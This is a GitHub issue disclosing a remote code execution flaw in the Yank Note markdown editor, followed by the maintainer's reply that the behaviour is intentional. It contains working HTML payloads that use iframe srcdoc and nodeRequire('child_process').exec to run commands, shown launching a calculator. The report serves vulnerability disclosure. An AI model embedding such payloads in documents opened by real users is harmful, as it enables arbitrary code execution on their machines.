### ISSUE TITLE
[BUG]: Yank Note Remote Code Execution via Iframe

### ISSUE THREAD

**Issue by aht7525** [purocean/yn#229]
```
Author: bob11.devranger@gmail.com
Data: 2022-11-08
OS: Windows, Linux, MacOS
YN Version : v3.43.0
```

### Summary

---

**It is possible to load nodeRequire using iframe.**

### Description

---

[1] W**e found that javascript execution is possible by adding a script tag using srcdoc, an option of the iframe tag.**

```html
<iframe srcdoc="<script>alert(1)</script>"></iframe>
```

![yn-rce-1](https://user-images.githubusercontent.com/33015799/201762291-6080270e-6ccb-4cac-ab92-aba7b8991d66.png)

[2] **And we found that it is possible to load nodeJS from JavaScript through nodeRequire. This enabled Remote Code Execution.**

```html
mac : <iframe srcdoc="<script>top.nodeRequire('child_process').exec('open -a /System/Applications/Calculator.app')</script>"></iframe>

windows : <iframe srcdoc="<script>top.nodeRequire('child_process').exec('calc')</script>"></iframe>
```

![yn-rce-2](https://user-images.githubusercontent.com/33015799/201762374-9ec4d060-2248-474f-8b8d-c321668255d0.png)

### what’s more

- You can see this poc video : [https://drive.google.com/file/d/1RdWDTbgY1wpO61FdqEkrt6ugcZRFnQ09/view?usp=sharing](https://drive.google.com/file/d/1RdWDTbgY1wpO61FdqEkrt6ugcZRFnQ09/view?usp=sharing)
- If you have any problems, contact me via [aht5886@gmail.com](mailto:aht5886@gmail.com) or [bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)
- Thank you :)

**Comment by purocean** [comment]
Thank you for you test. These security issues are known and intentional.

Yank Note positioning is not only a markdown editor, but also a highly open hacker's toy. You can even use it to [control a drone](https://github.com/purocean/yn/issues/65#issuecomment-962472316).

You use it at your own risk. I have put a warning in the [README](https://github.com/purocean/yn#attention), and It also does [not support opening files directly](https://blog-purocean.vercel.app/yank-note-01/#%E4%B8%80%E4%BA%9B%E9%97%AE%E9%A2%98).
